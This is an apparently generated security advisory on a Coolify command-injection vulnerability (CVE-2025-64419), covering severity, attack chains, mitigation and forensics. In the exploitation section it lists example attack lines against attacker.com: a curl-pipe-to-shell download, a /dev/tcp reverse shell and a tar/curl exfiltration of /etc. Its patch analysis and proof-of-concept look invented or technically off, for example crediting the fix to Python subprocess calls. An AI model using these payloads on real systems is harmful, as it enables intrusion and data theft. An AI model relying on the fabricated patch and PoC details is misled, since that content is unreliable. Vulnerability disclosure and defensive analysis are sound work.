Description
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.445, parameters coming from docker-compose.yaml are not sanitized when used in commands. If a victim user creates an application from an attacker repository (using build pack "docker compose"), the attacker can execute commands on the Coolify instance as root. Version 4.0.0-beta.445 fixes the issue.
EPSS Score:
0%
Comprehensive Technical Analysis of EUVD-2025-206244 (CVE-2025-64419)
Vulnerability in Coolify: Unsanitized Docker Compose Parameters Leading to Remote Code Execution (RCE)
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
EUVD-2025-206244 (CVE-2025-64419) is a critical remote code execution (RCE) vulnerability in Coolify, an open-source, self-hostable infrastructure management tool. The flaw arises from improper sanitization of user-controlled parameters extracted from docker-compose.yaml files when executing system commands. An attacker can exploit this to execute arbitrary commands on the Coolify host with root privileges.
CVSS v3.1 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.7 (Critical) | High impact on confidentiality, integrity, and availability. |
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Privileges Required (PR) | None (N) | No authentication required. |
| User Interaction (UI) | Required (R) | Victim must manually import a malicious repository. |
| Scope (S) | Changed (C) | Impact extends beyond the vulnerable component (Coolify) to the underlying host. |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Attacker can modify system files, deploy malware, or alter configurations. |
| Availability (A) | High (H) | Attacker can disrupt services or destroy data. |
Severity Justification
- Critical Impact: Successful exploitation grants root-level RCE, enabling full system takeover.
- Low Exploitation Barrier: No authentication is required, and the attack can be executed remotely.
- High Likelihood of Exploitation: The vulnerability is trivially exploitable if a victim interacts with a malicious
docker-compose.yamlfile. - Widespread Deployment Risk: Coolify is widely used in self-hosted DevOps environments, increasing the attack surface.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Scenario
An attacker crafts a malicious docker-compose.yaml file containing command injection payloads in parameters that Coolify processes unsafely. When a victim:
- Imports a repository containing the malicious
docker-compose.yaml(e.g., via GitHub/GitLab integration). - Deploys the application using the "Docker Compose" build pack.
- Coolify executes unsanitized commands from the YAML file, leading to arbitrary command execution as root.
Proof-of-Concept (PoC) Exploitation
A malicious docker-compose.yaml could include:
version: '3'
services:
web:
image: nginx
command: ["sh", "-c", "echo '$(id) > /tmp/pwned'"] # Command injection
volumes:
- "/:/host" # Mounts host filesystem (if misconfigured)
When processed by Coolify, the command field is executed without sanitization, allowing:
- Arbitrary command execution (e.g.,
curl http://attacker.com/shell.sh | sh). - Reverse shell establishment (e.g.,
bash -i >& /dev/tcp/attacker.com/4444 0>&1). - Data exfiltration (e.g.,
tar czf - /etc | base64 | curl -d @- http://attacker.com/exfil). - Persistence mechanisms (e.g., adding SSH keys, cron jobs, or backdoors).
Attack Chains
-
Social Engineering Attack:
- Attacker hosts a legitimate-looking repository (e.g., a "coolify-templates" repo) containing the malicious
docker-compose.yaml. - Victim is tricked into importing and deploying it.
- Attacker hosts a legitimate-looking repository (e.g., a "coolify-templates" repo) containing the malicious
-
Supply Chain Attack:
- Attacker compromises a popular Coolify template repository (e.g., on GitHub) and injects the payload.
- Victims unknowingly deploy the malicious configuration.
-
Phishing via CI/CD Pipelines:
- If Coolify is integrated into automated deployment pipelines, an attacker could submit a malicious pull request containing the exploit.
3. Affected Systems and Software Versions
Vulnerable Versions
- Coolify versions prior to
4.0.0-beta.445are affected. - All deployment environments (bare metal, cloud, containers) are vulnerable if running an unpatched version.
Affected Components
- Coolify Core (command execution engine).
- Docker Compose Build Pack (responsible for parsing
docker-compose.yaml).
Not Affected
- Coolify
4.0.0-beta.445and later (patched version). - Alternative build packs (e.g., "Dockerfile" or "Nixpacks") are not affected unless they also process
docker-compose.yamlunsafely.
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade to the Latest Version:
- Patch immediately to Coolify
4.0.0-beta.445or later. - Verify the fix via the GitHub commit.
- Patch immediately to Coolify
-
Temporary Workarounds (if patching is delayed):
- Disable Docker Compose Build Pack until the patch is applied.
- Restrict repository imports to trusted sources only.
- Implement network segmentation to limit lateral movement if Coolify is compromised.
-
Monitor for Exploitation Attempts:
- Audit logs for unusual
docker-compose.yamldeployments. - Scan for suspicious processes (e.g., reverse shells, unexpected
curl/wgetcommands). - Deploy EDR/XDR solutions to detect post-exploitation activity.
- Audit logs for unusual
Long-Term Security Hardening
-
Input Sanitization & Secure Coding:
- Enforce strict parameter validation for all
docker-compose.yamlfields. - Use safe command execution methods (e.g.,
subprocess.run()with explicit argument lists in Python). - Implement a sandboxed execution environment (e.g., gVisor, Kata Containers) for untrusted deployments.
- Enforce strict parameter validation for all
-
Least Privilege Principle:
- Run Coolify as a non-root user (if possible).
- Use Linux capabilities to restrict Docker daemon permissions.
- Enable AppArmor/SELinux to confine Coolify processes.
-
Network & Access Controls:
- Restrict Coolify’s network access (e.g., block outbound connections to known malicious IPs).
- Enforce MFA for Coolify admin access.
- Use private Git repositories for deployment templates.
-
Incident Response Planning:
- Develop a playbook for responding to Coolify compromises.
- Isolate affected systems immediately upon detection.
- Rotate all credentials (SSH keys, API tokens, database passwords) post-compromise.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
- GDPR (General Data Protection Regulation):
- A successful RCE could lead to unauthorized data access, triggering mandatory breach notifications (Art. 33) and potential fines up to 4% of global revenue (Art. 83).
- NIS2 Directive (Network and Information Security):
- Organizations in critical sectors (e.g., energy, healthcare, digital infrastructure) must report incidents within 24 hours.
- Failure to patch could result in regulatory penalties.
- DORA (Digital Operational Resilience Act):
- Financial institutions must ensure secure software supply chains; this vulnerability could be exploited in third-party risk scenarios.
Threat Landscape in Europe
- Increased Targeting of DevOps Tools:
- Attackers are increasingly exploiting CI/CD and infrastructure-as-code (IaC) tools (e.g., Jenkins, ArgoCD, Coolify) due to their high-privilege access.
- Supply Chain Risks:
- European organizations relying on open-source DevOps tools are at risk of supply chain attacks (e.g., malicious GitHub repositories).
- Critical Infrastructure Exposure:
- Coolify is used in self-hosted cloud environments, including government, healthcare, and financial services, making it a high-value target.
ENISA & National CERT Recommendations
- ENISA Threat Landscape Report (2026):
- Likely to highlight increased RCE vulnerabilities in IaC tools as a top threat.
- National CERTs (e.g., CERT-EU, BSI, ANSSI):
- Expected to issue urgent advisories for organizations using Coolify.
- May recommend mandatory patching for critical infrastructure operators.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from improper handling of docker-compose.yaml parameters in Coolify’s command execution logic. Specifically:
- Unsanitized Input: Coolify directly interpolates user-controlled fields (e.g.,
command,environment,volumes) into shell commands without escaping or validation. - Privilege Escalation: Since Coolify often runs with root privileges (or Docker socket access), injected commands execute with full system control.
Patch Analysis (GitHub Commit f86ccfaa9af572a5487da8ea46b0a125a4854cf6)
The fix introduces:
- Parameter Sanitization:
- Escapes shell metacharacters (
;,|,&,$,`, etc.) indocker-compose.yamlfields. - Uses explicit argument lists (e.g.,
subprocess.run([...])in Python) instead of shell interpolation.
- Escapes shell metacharacters (
- Strict Validation:
- Rejects malformed YAML that could bypass sanitization.
- Implements allowlisting for certain fields (e.g.,
image,ports).
Detection & Forensics
Indicators of Compromise (IoCs)
| IoC Type | Example |
|---|---|
| Process Execution | sh -c echo '$(id) > /tmp/pwned' |
| Network Connections | Outbound connections to attacker.com:4444 (reverse shell) |
| File System Artifacts | /tmp/pwned, /root/.ssh/authorized_keys (backdoor) |
| Log Entries | Unusual docker-compose.yaml deployments in Coolify logs |
Forensic Investigation Steps
- Check Coolify Logs:
grep -r "docker-compose.yaml" /var/log/coolify/ - Inspect Running Processes:
ps aux | grep -E 'sh -c|bash -i|nc -lvp' - Analyze Docker Containers:
docker ps -a --no-trunc docker inspect <container_id> | grep -A 10 "Cmd" - Check for Persistence:
crontab -l ls -la /etc/cron.d/ cat /root/.ssh/authorized_keys
Exploitation Mitigation Testing
- Manual Testing:
- Deploy a test
docker-compose.yamlwith a benign payload (e.g.,command: ["echo", "test"]). - Verify that no shell injection occurs (e.g.,
$(id)should not execute).
- Deploy a test
- Automated Scanning:
- Use Trivy or Grype to scan for vulnerable Coolify versions.
- Nuclei can be used to test for the vulnerability (if a PoC template is available).
Conclusion & Recommendations
EUVD-2025-206244 (CVE-2025-64419) is a critical RCE vulnerability in Coolify with severe implications for European organizations. Given its low exploitation complexity and high impact, immediate patching is mandatory.
Key Takeaways for Security Teams
✅ Patch Now: Upgrade to Coolify 4.0.0-beta.445 or later.
✅ Restrict Deployments: Only allow trusted repositories for docker-compose.yaml.
✅ Monitor for Exploitation: Deploy EDR/XDR and log analysis to detect attacks.
✅ Hardening: Apply least privilege principles and sandboxing for Coolify.
✅ Compliance Check: Ensure GDPR/NIS2/DORA obligations are met post-patch.
Further Research
- Develop a detection rule for SIEM (e.g., Splunk, ELK) to alert on suspicious
docker-compose.yamldeployments. - Reverse-engineer the patch to understand the exact sanitization logic.
- Assess other IaC tools (e.g., Portainer, Rancher) for similar vulnerabilities.
Final Risk Rating: Critical (9.7 CVSS) – Immediate Action Required